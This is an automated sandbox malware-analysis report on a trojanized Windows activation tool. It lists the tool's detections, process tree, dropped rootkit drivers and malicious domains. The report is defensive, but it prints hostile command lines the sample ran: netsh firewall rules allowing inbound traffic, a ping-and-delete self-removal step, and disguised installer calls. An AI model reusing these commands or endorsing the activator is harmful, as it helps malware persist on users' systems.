Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HEU_KMS_Activator.exe

Overview

General Information

Sample name:HEU_KMS_Activator.exe
Analysis ID:1480974
MD5:28c6bc044e78763a789638242f708f9e
SHA1:d6670c2e2d8646b6ea5acc292bfcb5c6f4f14cd2
SHA256:d9c9cbc0fccd8f456e76d55b3be079b4f062272e2777f02d7438de4310357e36
Tags:exe
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Binary is likely a compiled AutoIt script file
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to infect the boot sector
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the windows firewall
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Suspicious Ping/Del Command Combination
Uses netsh to modify the Windows network and firewall settings
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses powercfg.exe to modify the power settings
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to create an SMB header
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • HEU_KMS_Activator.exe (PID: 4428 cmdline: "C:\Users\user\Desktop\HEU_KMS_Activator.exe" MD5: 28C6BC044E78763A789638242F708F9E)
    • _J8156NOVDEC.exe (PID: 2928 cmdline: C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe MD5: 1474BD3EDA2E087560754241A0B92991)
      • cmd.exe (PID: 2868 cmdline: "C:\Windows\System32\cmd.exe" /c ping -n 3 127.1 >nul & del /q C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 5756 cmdline: ping -n 3 127.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
    • HEU_KMS_Activator.exe (PID: 4452 cmdline: C:\Users\user~1\AppData\Local\Temp\HEU_KMS_Activator.exe MD5: 7CD8B711BE93FF8858B7DC753C4065CA)
      • cmd.exe (PID: 2584 cmdline: C:\Windows\system32\cmd.exe /c echo [Temp] >%windir%\ScriptTemp.ini MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6600 cmdline: C:\Windows\system32\cmd.exe /c echo Temp=_temp07242019502489 >>%windir%\ScriptTemp.ini MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6636 cmdline: C:\Windows\system32\cmd.exe /c set "Path=%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;" & netsh advfirewall firewall delete rule name="HEU_KMS_Activator" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 5108 cmdline: netsh advfirewall firewall delete rule name="HEU_KMS_Activator" MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • cmd.exe (PID: 1432 cmdline: C:\Windows\system32\cmd.exe /c set "Path=%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;" & netsh advfirewall firewall add rule name="HEU_KMS_Activator" dir=in action=allow profile=any program="C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 3032 cmdline: netsh advfirewall firewall add rule name="HEU_KMS_Activator" dir=in action=allow profile=any program="C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe" MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • 7Z.EXE (PID: 7428 cmdline: C:\Windows\_temp07242019502489\7Z.EXE x C:\Windows\_temp07242019502489\KMSmini.7z -y -oC:\Windows\_temp07242019502489 MD5: 42BADC1D2F03A8B1E4875740D3D49336)
        • conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7568 cmdline: C:\Windows\system32\cmd.exe /c set "Path=%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;" & echo [Direction] >%windir%\_temp07242019502489\ScriptDir.ini MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7620 cmdline: C:\Windows\system32\cmd.exe /c set "Path=%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;" & echo Dir=C:\Users\user\AppData\Local\Temp >>%windir%\_temp07242019502489\ScriptDir.ini MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7672 cmdline: C:\Windows\system32\cmd.exe /c set "Path=%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;" & echo Name=HEU_KMS_Activator.exe >>%windir%\_temp07242019502489\ScriptDir.ini MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • kms_x64.exe (PID: 7728 cmdline: C:\Windows\_temp07242019502489\kms_x64.exe MD5: 99DF73A907996E98E96917FAE743B506)
    • DvLayout.exe (PID: 6024 cmdline: "C:\Windows\SysNative\drivers\DvLayout.exe" 200156 Helicarrier wccenter.exe wrme.exe wuhost.exe wdlogin.exe LSI_SAS2l iaLPSS1z "CSIDL_LOCAL_APPDATA&Microsoft\Event Viewer" Hook MD5: 99B17FCCE8D54EA90FF5C0B9EF4FCE73)
      • powercfg.exe (PID: 1408 cmdline: powercfg /h off MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)
        • conhost.exe (PID: 2000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wrme.exe (PID: 6296 cmdline: "C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe" -install MD5: 35C545E719D8D04771BE35081626CE3B)
  • J8156NOVDEC.exe (PID: 2760 cmdline: C:\Users\user~1\AppData\Local\Temp\J8156NOVDEC.exe MD5: 1474BD3EDA2E087560754241A0B92991)
    • WMIC.exe (PID: 7356 cmdline: wmic BaseBoard get SerialNumber MD5: E2DE6500DE1148C7F6027AD50AC8B891)
      • conhost.exe (PID: 7376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 4708 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 5888 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 4696 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 5328 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6500 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 4428 cmdline: C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 5756 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7276 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 3964 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7516 cmdline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 8132 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Suspicious Ping/Del Command Combination
Source: Process startedAuthor: Ilya Krestinichev: Data: Command: "C:\Windows\System32\cmd.exe" /c ping -n 3 127.1 >nul & del /q C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe, CommandLine: "C:\Windows\System32\cmd.exe" /c ping -n 3 127.1 >nul & del /q C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe, ParentImage: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe, ParentProcessId: 2928, ParentProcessName: _J8156NOVDEC.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c ping -n 3 127.1 >nul & del /q C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe, ProcessId: 2868, ProcessName: cmd.exe
Sigma detected: Use Short Name Path in Command Line
Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe, CommandLine: C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe, ParentCommandLine: "C:\Users\user\Desktop\HEU_KMS_Activator.exe", ParentImage: C:\Users\user\Desktop\HEU_KMS_Activator.exe, ParentProcessId: 4428, ParentProcessName: HEU_KMS_Activator.exe, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe, ProcessId: 2928, ProcessName: _J8156NOVDEC.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, ProcessId: 4708, ProcessName: svchost.exe

Snort Signatures

No Snort rule has matched

Suricata Signatures

Timestamp:2024-07-25T02:19:58.844006+0200
SID:2840787
Source Port:49713
Destination Port:443
Protocol:TCP
Classtype:Potentially Bad Traffic
Timestamp:2024-07-25T02:19:51.775160+0200
SID:2803274
Source Port:49699
Destination Port:80
Protocol:TCP
Classtype:Potentially Bad Traffic
Timestamp:2024-07-25T02:19:53.037690+0200
SID:2012510
Source Port:80
Destination Port:49699
Protocol:TCP
Classtype:Potentially Bad Traffic
Timestamp:2024-07-25T02:19:53.251253+0200
SID:2012510
Source Port:80
Destination Port:49699
Protocol:TCP
Classtype:Potentially Bad Traffic
Timestamp:2024-07-25T02:19:53.037548+0200
SID:2012510
Source Port:80
Destination Port:49699
Protocol:TCP
Classtype:Potentially Bad Traffic
Timestamp:2024-07-25T02:20:06.787407+0200
SID:2022930
Source Port:443
Destination Port:49717
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-07-25T02:20:45.968967+0200
SID:2022930
Source Port:443
Destination Port:49737
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-07-25T02:19:53.034129+0200
SID:2012510
Source Port:80
Destination Port:49699
Protocol:TCP
Classtype:Potentially Bad Traffic
Timestamp:2024-07-25T02:19:53.124191+0200
SID:2012510
Source Port:80
Destination Port:49699
Protocol:TCP
Classtype:Potentially Bad Traffic
Timestamp:2024-07-25T02:19:53.037758+0200
SID:2012510
Source Port:80
Destination Port:49699
Protocol:TCP
Classtype:Potentially Bad Traffic
Timestamp:2024-07-25T02:19:53.124522+0200
SID:2012510
Source Port:80
Destination Port:49699
Protocol:TCP
Classtype:Potentially Bad Traffic

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: HEU_KMS_Activator.exeAvira: detected
Antivirus detection for URL or domain
Source: https://db.testyk.com/api/v1/pAvira URL Cloud: Label: malware
Source: http://ww25.db.testyk.com/api/v1/p?subid1=20240725-1019-57bf-a1Avira URL Cloud: Label: malware
Source: https://db.testyk.comAvira URL Cloud: Label: malware
Source: http://ww25.db.testyk.com/api/v1/p?subid1=20240725-1019-57bf-a1YAvira URL Cloud: Label: malware
Source: https://db.testyk.com/api/v1/ppk?Avira URL Cloud: Label: malware
Source: http://ww25.db.testyk.com/api/v1/p?subid1=20240725-1019-57bf-a132-0ab44d06a73dAvira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeAvira: detection malicious, Label: TR/Agent.vdqps
Source: C:\Windows\System32\drivers\KMDF_LOOK.sysAvira: detection malicious, Label: HEUR/AGEN.1303604
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeAvira: detection malicious, Label: TR/Agent.vdqps
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wuhost.exeAvira: detection malicious, Label: RKIT/Agent.xdjdp
Source: C:\Windows\System32\drivers\DvLayout.exeAvira: detection malicious, Label: TR/Agent.ugoop
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeAvira: detection malicious, Label: RKIT/Agent.moamk
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wdlogin.exeAvira: detection malicious, Label: TR/Agent.tzwxs
Source: C:\Windows\System32\drivers\KMDF_Protect.sysAvira: detection malicious, Label: HEUR/AGEN.1303604
Multi AV Scanner detection for domain / URL
Source: du.testjj.comVirustotal: Detection: 9%Perma Link
Source: db.testyk.comVirustotal: Detection: 9%Perma Link
Source: https://du.testjj.com/api/v1/idoVirustotal: Detection: 12%Perma Link
Source: https://du.testjj.com/api/v1/idtVirustotal: Detection: 11%Perma Link
Source: https://du.testjj.comVirustotal: Detection: 9%Perma Link
Source: https://du.testjj.com/api/v1/ideVirustotal: Detection: 8%Perma Link
Source: https://du.testjj.com/api/v1/idhVirustotal: Detection: 11%Perma Link
Source: https://db.testyk.com/api/v1/pVirustotal: Detection: 10%Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wccenter.exeReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wdlogin.exeReversingLabs: Detection: 85%
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wuhost.exeReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeReversingLabs: Detection: 86%
Source: C:\Windows\HeuKmsRenewal\HEU_KMS_Activator.exeReversingLabs: Detection: 65%
Source: C:\Windows\System32\drivers\DvLayout.exeReversingLabs: Detection: 69%
Source: C:\Windows\System32\drivers\KMDF_LOOK.sysReversingLabs: Detection: 88%
Source: C:\Windows\System32\drivers\KMDF_Protect.sysReversingLabs: Detection: 50%
Source: C:\Windows\_temp07242019502489\kms-client.exeReversingLabs: Detection: 33%
Source: C:\Windows\_temp07242019502489\kms-server.exeReversingLabs: Detection: 48%
Source: C:\Windows\_temp07242019502489\kms.exeReversingLabs: Detection: 56%
Source: C:\Windows\_temp07242019502489\x64\SECOPatcher.dllReversingLabs: Detection: 45%
Source: C:\Windows\_temp07242019502489\x86\SECOPatcher.dllReversingLabs: Detection: 32%
Source: C:\Windows\system32\drivers\CbDServices.sys (copy)ReversingLabs: Detection: 50%
Source: C:\Windows\system32\drivers\mvtnom.sys (copy)ReversingLabs: Detection: 88%
Multi AV Scanner detection for submitted file
Source: HEU_KMS_Activator.exeReversingLabs: Detection: 68%
Source: HEU_KMS_Activator.exeVirustotal: Detection: 73%Perma Link
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\autC8A0.tmpJoe Sandbox ML: detected
Source: C:\Windows\HeuKmsRenewal\HEU_KMS_Activator.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeJoe Sandbox ML: detected
Source: C:\Windows\_temp07242019502489\kms.exeJoe Sandbox ML: detected
Machine Learning detection for sample
Source: HEU_KMS_Activator.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_00680250 GetModuleHandleA,GetProcAddress,CertOpenStore,GetLastError,CryptStringToBinaryA,CertFindCertificateInStore,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,@_RTC_CheckStackVars@8,2_2_00680250
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006BA2F0 CryptAcquireContextA,CryptCreateHash,2_2_006BA2F0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006BA360 CryptHashData,2_2_006BA360
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006B03E0 GetLastError,CreateFileA,GetLastError,GetFileSizeEx,GetLastError,ReadFile,GetLastError,_strlen,_strstr,_strlen,_strstr,CryptQueryObject,GetLastError,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,CloseHandle,@_RTC_CheckStackVars@8,2_2_006B03E0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006BA390 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,@_RTC_CheckStackVars@8,2_2_006BA390
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_00682F50 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,@_RTC_CheckStackVars@8,2_2_00682F50
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_00683030 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,@_RTC_CheckStackVars@8,2_2_00683030
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006B3790 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,@_RTC_CheckStackVars@8,2_2_006B3790
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_00683BC0 CryptAcquireContextA,CryptCreateHash,2_2_00683BC0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_00683C50 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,@_RTC_CheckStackVars@8,2_2_00683C50
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_00683C20 CryptHashData,2_2_00683C20
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C40250 GetModuleHandleA,GetProcAddress,CertOpenStore,GetLastError,CryptStringToBinaryA,CertFindCertificateInStore,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,@_RTC_CheckStackVars@8,3_2_00C40250
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C7A2F0 CryptAcquireContextA,CryptCreateHash,3_2_00C7A2F0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C703E0 GetLastError,CreateFileA,GetLastError,GetFileSizeEx,GetLastError,ReadFile,GetLastError,_strlen,_strlen,CryptQueryObject,GetLastError,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,CloseHandle,@_RTC_CheckStackVars@8,3_2_00C703E0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C7A390 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,@_RTC_CheckStackVars@8,3_2_00C7A390
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C7A360 CryptHashData,3_2_00C7A360
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C42F50 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,@_RTC_CheckStackVars@8,3_2_00C42F50
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C43030 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,@_RTC_CheckStackVars@8,3_2_00C43030
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C73790 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,@_RTC_CheckStackVars@8,3_2_00C73790
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C43BC0 CryptAcquireContextA,CryptCreateHash,3_2_00C43BC0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C43C50 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,@_RTC_CheckStackVars@8,3_2_00C43C50
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C43C20 CryptHashData,3_2_00C43C20
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00E940D0 CryptAcquireContextA,CryptCreateHash,17_2_00E940D0
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00EB21C0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,17_2_00EB21C0
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00E94130 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,17_2_00E94130
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00E94110 CryptHashData,17_2_00E94110
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00EAB5E0 GetLastError,CreateFileA,GetLastError,GetFileSizeEx,GetLastError,ReadFile,_strstr,_strstr,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,GetLastError,CloseHandle,17_2_00EAB5E0
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00EAE520 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,17_2_00EAE520
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00E90D80 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,17_2_00E90D80
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00E90E50 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,17_2_00E90E50
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_e252cbe5-c
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: mov dword ptr [ebx+04h], 424D53FFh17_2_00E96160
Source: HEU_KMS_Activator.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Windows\_temp07242019502489\7Z.EXEFile opened: C:\Windows\_temp07242019502489\x86\msvcr100.dll
Source: unknownHTTPS traffic detected: 103.224.212.216:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 103.224.212.211:443 -> 192.168.2.7:49711 version: TLS 1.2
Source: Binary string: msvcr100.amd64.pdb source: 7Z.EXE, 00000022.00000003.1321709735.00000000025E6000.00000004.00000020.00020000.00000000.sdmp, msvcr100.dll0.34.dr
Source: Binary string: F:\20201028P\KMDF_Protect\Release\KMDF_Protect_64.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\Work\Install_Driver\Driver_helper\Release\wuhost.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, wuhost.exe.1.dr
Source: Binary string: W:\SECOPatcher\temp\Release\Win32\SECOPatcher\SECOPatcher.pdb source: 7Z.EXE, 00000022.00000003.1322653977.0000000000750000.00000004.00001000.00020000.00000000.sdmp, 7Z.EXE, 00000022.00000003.1321709735.00000000025E6000.00000004.00000020.00020000.00000000.sdmp, SECOPatcher.dll.34.dr
